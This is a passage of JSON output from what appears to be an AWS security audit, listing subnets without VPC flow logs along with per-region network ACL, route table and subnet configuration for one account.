","vpc.regions.ap-south-1.vpcs.vpc-2651a14d.subnets.subnet-7d5a1431.NoFlowLog","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-2506d06d.NoFlowLog","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-a448d5fd.NoFlowLog","vpc.regions.ap-southeast-1.vpcs.vpc-04ed1062.subnets.subnet-b73197d1.NoFlowLog","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-b3fe86eb.NoFlowLog","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-0c0bc26a.NoFlowLog","vpc.regions.ap-southeast-2.vpcs.vpc-5d22c33b.subnets.subnet-6cb44e24.NoFlowLog","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-1cd98b74.NoFlowLog","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-4f896210.NoFlowLog","vpc.regions.ca-central-1.vpcs.vpc-b5113ddd.subnets.subnet-85711fff.NoFlowLog","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-ecc66390.NoFlowLog","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-55d77f19.NoFlowLog","vpc.regions.eu-central-1.vpcs.vpc-78b43312.subnets.subnet-292d4343.NoFlowLog","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-1d972e74.NoFlowLog","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-fe16ce85.NoFlowLog","vpc.regions.eu-north-1.vpcs.vpc-fa259d93.subnets.subnet-c98e7484.NoFlowLog","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-b3a000e9.NoFlowLog","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-b1c2a5d7.NoFlowLog","vpc.regions.eu-west-1.vpcs.vpc-f24c7994.subnets.subnet-214f3969.NoFlowLog","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-edaf13a1.NoFlowLog","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-e682ec9c.NoFlowLog","vpc.regions.eu-west-2.vpcs.vpc-3fa2fa57.subnets.subnet-43bf9d2a.NoFlowLog","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-b309b8fe.NoFlowLog","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-762a450d.NoFlowLog","vpc.regions.eu-west-3.vpcs.vpc-87d3fdee.subnets.subnet-e9e1b480.NoFlowLog","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-6a4dd723.NoFlowLog","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-9aa5c1fc.NoFlowLog","vpc.regions.sa-east-1.vpcs.vpc-b14fa4d7.subnets.subnet-aaddbef1.NoFlowLog","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-6e61f24f.NoFlowLog","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-8c27ffbd.NoFlowLog","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-30be2f6f.NoFlowLog","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-77e07411.NoFlowLog","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-cbefcb86.NoFlowLog","vpc.regions.us-east-1.vpcs.vpc-ba1cbdc7.subnets.subnet-7056187e.NoFlowLog","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-fac76891.NoFlowLog","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-81a1eccd.NoFlowLog","vpc.regions.us-east-2.vpcs.vpc-e429ad8f.subnets.subnet-18e60365.NoFlowLog","vpc.regions.us-west-1.vpcs.vpc-6e6fa508.subnets.subnet-3162b36b.NoFlowLog","vpc.regions.us-west-1.vpcs.vpc-6e6fa508.subnets.subnet-64f07402.NoFlowLog","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-64dae84f.NoFlowLog","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-113ce95b.NoFlowLog","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-25f65d5d.NoFlowLog","vpc.regions.us-west-2.vpcs.vpc-d45709ac.subnets.subnet-1075cf4d.NoFlowLog"],"level": "warning","path": "vpc.regions.id.vpcs.id.subnets.id","rationale": "Flow logs enable the investigatation of incidents involving unauthorized network traffic, such as an attacker exfiltrating data or pivoting to other hosts.","service": "VPC"}},"flow_logs_count": 0,"network_acls_count": 17,"peering_connections_count": 0,"regions": {"af-south-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 0,"peering_connections": {},"peering_connections_count": 0,"region": "af-south-1","route_tables_count": 0,"subnets_count": 0,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {},"vpcs_count": 0,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"ap-east-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 0,"peering_connections": {},"peering_connections_count": 0,"region": "ap-east-1","route_tables_count": 0,"subnets_count": 0,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {},"vpcs_count": 0,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"ap-northeast-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "ap-northeast-1","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-0cbc506a": {"name": "vpc-0cbc506a","network_acls": {"acl-c777e5a1": {"Associations": [{"NetworkAclAssociationId": "aclassoc-31486e40","NetworkAclId": "acl-c777e5a1","SubnetId": "subnet-a668c6ee"},{"NetworkAclAssociationId": "aclassoc-4e486e3f","NetworkAclId": "acl-c777e5a1","SubnetId": "subnet-7f50e154"},{"NetworkAclAssociationId": "aclassoc-4f486e3e","NetworkAclId": "acl-c777e5a1","SubnetId": "subnet-593d2502"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-0cbc506a","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-c777e5a1","name": "acl-c777e5a1","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-a3490cc5": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-0389c27a","RouteTableId": "rtb-a3490cc5"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-c330d8a4","Origin": "CreateRoute","State": "active"}],"name": "vpc-0cbc506a"}},"subnets": {"subnet-593d2502": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-1c","AvailabilityZoneId": "apne1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-1:430150006394:subnet/subnet-593d2502","SubnetId": "subnet-593d2502","VpcId": "vpc-0cbc506a","flow_logs": [],"name": "subnet-593d2502","network_acl": "acl-c777e5a1"},"subnet-7f50e154": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-1d","AvailabilityZoneId": "apne1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-1:430150006394:subnet/subnet-7f50e154","SubnetId": "subnet-7f50e154","VpcId": "vpc-0cbc506a","flow_logs": [],"name": "subnet-7f50e154","network_acl": "acl-c777e5a1"},"subnet-a668c6ee": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-1a","AvailabilityZoneId": "apne1-az4","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-1:430150006394:subnet/subnet-a668c6ee","SubnetId": "subnet-a668c6ee","VpcId": "vpc-0cbc506a","flow_logs": [],"name": "subnet-a668c6ee","network_acl": "acl-c777e5a1"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"ap-northeast-2": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "ap-northeast-2","route_tables_count": 1,"subnets_count": 4,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-73f44e18": {"name": "vpc-73f44e18","network_acls": {"acl-75e1951e": {"Associations": [{"NetworkAclAssociationId": "aclassoc-37937854","NetworkAclId": "acl-75e1951e","SubnetId": "subnet-e6ad198d"},{"NetworkAclAssociationId": "aclassoc-35937856","NetworkAclId": "acl-75e1951e","SubnetId": "subnet-cf001883"},{"NetworkAclAssociationId": "aclassoc-36937855","NetworkAclId": "acl-75e1951e","SubnetId": "subnet-af6809d4"},{"NetworkAclAssociationId": "aclassoc-34937857","NetworkAclId": "acl-75e1951e","SubnetId": "subnet-8447addb"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-73f44e18","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-75e1951e","name": "acl-75e1951e","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-80d292eb": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-c9e06ea3","RouteTableId": "rtb-80d292eb"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-053d546d","Origin": "CreateRoute","State": "active"}],"name": "vpc-73f44e18"}},"subnets": {"subnet-8447addb": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-2d","AvailabilityZoneId": "apne2-az4","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.48.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-2:430150006394:subnet/subnet-8447addb","SubnetId": "subnet-8447addb","VpcId": "vpc-73f44e18","flow_logs": [],"name": "subnet-8447addb","network_acl": "acl-75e1951e"},"subnet-af6809d4": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-2b","AvailabilityZoneId": "apne2-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-2:430150006394:subnet/subnet-af6809d4","SubnetId": "subnet-af6809d4","VpcId": "vpc-73f44e18","flow_logs": [],"name": "subnet-af6809d4","network_acl": "acl-75e1951e"},"subnet-cf001883": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-2c","AvailabilityZoneId": "apne2-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-2:430150006394:subnet/subnet-cf001883","SubnetId": "subnet-cf001883","VpcId": "vpc-73f44e18","flow_logs": [],"name": "subnet-cf001883","network_acl": "acl-75e1951e"},"subnet-e6ad198d": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-2a","AvailabilityZoneId": "apne2-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-2:430150006394:subnet/subnet-e6ad198d","SubnetId": "subnet-e6ad198d","VpcId": "vpc-73f44e18","flow_logs": [],"name": "subnet-e6ad198d","network_acl": "acl-75e1951e"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"ap-northeast-3": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "ap-northeast-3","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-47b7dd2e": {"name": "vpc-47b7dd2e","network_acls": {"acl-bb1b62d2": {"Associations": [{"NetworkAclAssociationId": "aclassoc-1953e271","NetworkAclId": "acl-bb1b62d2","SubnetId": "subnet-c1b6118c"},{"NetworkAclAssociationId": "aclassoc-1853e270","NetworkAclId": "acl-bb1b62d2","SubnetId": "subnet-4dcc0924"},{"NetworkAclAssociationId": "aclassoc-0753e26f","NetworkAclId": "acl-bb1b62d2","SubnetId": "subnet-546a8e2f"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-47b7dd2e","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-bb1b62d2","name": "acl-bb1b62d2","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-18286671": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-85fd86ec","RouteTableId": "rtb-18286671"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-334bca5a","Origin": "CreateRoute","State": "active"}],"name": "vpc-47b7dd2e"}},"subnets": {"subnet-4dcc0924": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-3b","AvailabilityZoneId": "apne3-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-3:430150006394:subnet/subnet-4dcc0924","SubnetId": "subnet-4dcc0924","VpcId": "vpc-47b7dd2e","flow_logs": [],"name": "subnet-4dcc0924","network_acl": "acl-bb1b62d2"},"subnet-546a8e2f": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-3c","AvailabilityZoneId": "apne3-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-3:430150006394:subnet/subnet-546a8e2f","SubnetId": "subnet-546a8e2f","VpcId": "vpc-47b7dd2e","flow_logs": [],"name": "subnet-546a8e2f","network_acl": "acl-bb1b62d2"},"subnet-c1b6118c": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-northeast-3a","AvailabilityZoneId": "apne3-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-northeast-3:430150006394:subnet/subnet-c1b6118c","SubnetId": "subnet-c1b6118c","VpcId": "vpc-47b7dd2e","flow_logs": [],"name": "subnet-c1b6118c","network_acl": "acl-bb1b62d2"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"ap-south-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "ap-south-1","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-2651a14d": {"name": "vpc-2651a14d","network_acls": {"acl-a676adcd": {"Associations": [{"NetworkAclAssociationId": "aclassoc-c9d2b0a8","NetworkAclId": "acl-a676adcd","SubnetId": "subnet-d3c151a8"},{"NetworkAclAssociationId": "aclassoc-c6d2b0a7","NetworkAclId": "acl-a676adcd","SubnetId": "subnet-7d5a1431"},{"NetworkAclAssociationId": "aclassoc-c8d2b0a9","NetworkAclId": "acl-a676adcd","SubnetId": "subnet-f0fde498"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-2651a14d","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-a676adcd","name": "acl-a676adcd","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-f3d26398": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-645c5d0f","RouteTableId": "rtb-f3d26398"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-c8ee63a0","Origin": "CreateRoute","State": "active"}],"name": "vpc-2651a14d"}},"subnets": {"subnet-7d5a1431": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-south-1b","AvailabilityZoneId": "aps1-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-south-1:430150006394:subnet/subnet-7d5a1431","SubnetId": "subnet-7d5a1431","VpcId": "vpc-2651a14d","flow_logs": [],"name": "subnet-7d5a1431","network_acl": "acl-a676adcd"},"subnet-d3c151a8": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-south-1c","AvailabilityZoneId": "aps1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-south-1:430150006394:subnet/subnet-d3c151a8","SubnetId": "subnet-d3c151a8","VpcId": "vpc-2651a14d","flow_logs": [],"name": "subnet-d3c151a8","network_acl": "acl-a676adcd"},"subnet-f0fde498": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-south-1a","AvailabilityZoneId": "aps1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-south-1:430150006394:subnet/subnet-f0fde498","SubnetId": "subnet-f0fde498","VpcId": "vpc-2651a14d","flow_logs": [],"name": "subnet-f0fde498","network_acl": "acl-a676adcd"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"ap-southeast-1": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "ap-southeast-1","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-04ed1062": {"name": "vpc-04ed1062","network_acls": {"acl-8787e0e1": {"Associations": [{"NetworkAclAssociationId": "aclassoc-a6b2e6d8","NetworkAclId": "acl-8787e0e1","SubnetId": "subnet-2506d06d"},{"NetworkAclAssociationId": "aclassoc-a8b2e6d6","NetworkAclId": "acl-8787e0e1","SubnetId": "subnet-a448d5fd"},{"NetworkAclAssociationId": "aclassoc-a9b2e6d7","NetworkAclId": "acl-8787e0e1","SubnetId": "subnet-b73197d1"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-04ed1062","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-8787e0e1","name": "acl-8787e0e1","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-cd6d2cab": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-35394a4c","RouteTableId": "rtb-cd6d2cab"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-3aced35e","Origin": "CreateRoute","State": "active"}],"name": "vpc-04ed1062"}},"subnets": {"subnet-2506d06d": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-southeast-1a","AvailabilityZoneId": "apse1-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-southeast-1:430150006394:subnet/subnet-2506d06d","SubnetId": "subnet-2506d06d","VpcId": "vpc-04ed1062","flow_logs": [],"name": "subnet-2506d06d","network_acl": "acl-8787e0e1"},"subnet-a448d5fd": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-southeast-1c","AvailabilityZoneId": "apse1-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-southeast-1:430150006394:subnet/subnet-a448d5fd","SubnetId": "subnet-a448d5fd","VpcId": "vpc-04ed1062","flow_logs": [],"name": "subnet-a448d5fd","network_acl": "acl-8787e0e1"},"subnet-b73197d1": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-southeast-1b","AvailabilityZoneId": "apse1-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-southeast-1:430150006394:subnet/subnet-b73197d1","SubnetId": "subnet-b73197d1","VpcId": "vpc-04ed1062","flow_logs": [],"name": "subnet-b73197d1","network_acl": "acl-8787e0e1"}}}},"vpcs_count": 1,"vpn_connections": {},"vpn_connections_count": 0,"vpn_gateways": {},"vpn_gateways_count": 0},"ap-southeast-2": {"customer_gateways": {},"customer_gateways_count": 0,"flow_logs": {},"flow_logs_count": 0,"network_acls_count": 1,"peering_connections": {},"peering_connections_count": 0,"region": "ap-southeast-2","route_tables_count": 1,"subnets_count": 3,"vpc_resource_types": ["network_acls","subnets","route_tables"],"vpcs": {"vpc-5d22c33b": {"name": "vpc-5d22c33b","network_acls": {"acl-4e4dc228": {"Associations": [{"NetworkAclAssociationId": "aclassoc-fdeb7a8d","NetworkAclId": "acl-4e4dc228","SubnetId": "subnet-6cb44e24"},{"NetworkAclAssociationId": "aclassoc-fbeb7a8b","NetworkAclId": "acl-4e4dc228","SubnetId": "subnet-0c0bc26a"},{"NetworkAclAssociationId": "aclassoc-fceb7a8c","NetworkAclId": "acl-4e4dc228","SubnetId": "subnet-b3fe86eb"}],"IsDefault": true,"OwnerId": "430150006394","Tags": [],"VpcId": "vpc-5d22c33b","allow_all_egress_traffic": "100","allow_all_ingress_traffic": "100","id": "acl-4e4dc228","name": "acl-4e4dc228","rules": {"egress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}},"ingress": {"100": {"CidrBlock": "0.0.0.0/0","RuleAction": "allow","port_range": "1-65535","protocol": "ALL"},"32767": {"CidrBlock": "0.0.0.0/0","RuleAction": "deny","port_range": "1-65535","protocol": "ALL"}}},"use_default_egress_rules": true,"use_default_ingress_rules": true}},"route_tables": {"rtb-098ee56f": {"Associations": [{"AssociationState": {"State": "associated"},"Main": true,"RouteTableAssociationId": "rtbassoc-e9d1e490","RouteTableId": "rtb-098ee56f"}],"PropagatingVgws": [],"Routes": [{"DestinationCidrBlock": "172.31.0.0/16","GatewayId": "local","Origin": "CreateRouteTable","State": "active"},{"DestinationCidrBlock": "0.0.0.0/0","GatewayId": "igw-a4d127c3","Origin": "CreateRoute","State": "active"}],"name": "vpc-5d22c33b"}},"subnets": {"subnet-0c0bc26a": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-southeast-2b","AvailabilityZoneId": "apse2-az1","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.0.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-southeast-2:430150006394:subnet/subnet-0c0bc26a","SubnetId": "subnet-0c0bc26a","VpcId": "vpc-5d22c33b","flow_logs": [],"name": "subnet-0c0bc26a","network_acl": "acl-4e4dc228"},"subnet-6cb44e24": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-southeast-2a","AvailabilityZoneId": "apse2-az3","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.32.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": false,"MapPublicIpOnLaunch": true,"OwnerId": "430150006394","State": "available","SubnetArn": "arn:aws:ec2:ap-southeast-2:430150006394:subnet/subnet-6cb44e24","SubnetId": "subnet-6cb44e24","VpcId": "vpc-5d22c33b","flow_logs": [],"name": "subnet-6cb44e24","network_acl": "acl-4e4dc228"},"subnet-b3fe86eb": {"AssignIpv6AddressOnCreation": false,"AvailabilityZone": "ap-southeast-2c","AvailabilityZoneId": "apse2-az2","AvailableIpAddressCount": 4091,"CidrBlock": "172.31.16.0/20","DefaultForAz": true,"Ipv6CidrBlockAssociationSet": [],"MapCustomerOwnedIpOnLaunch": 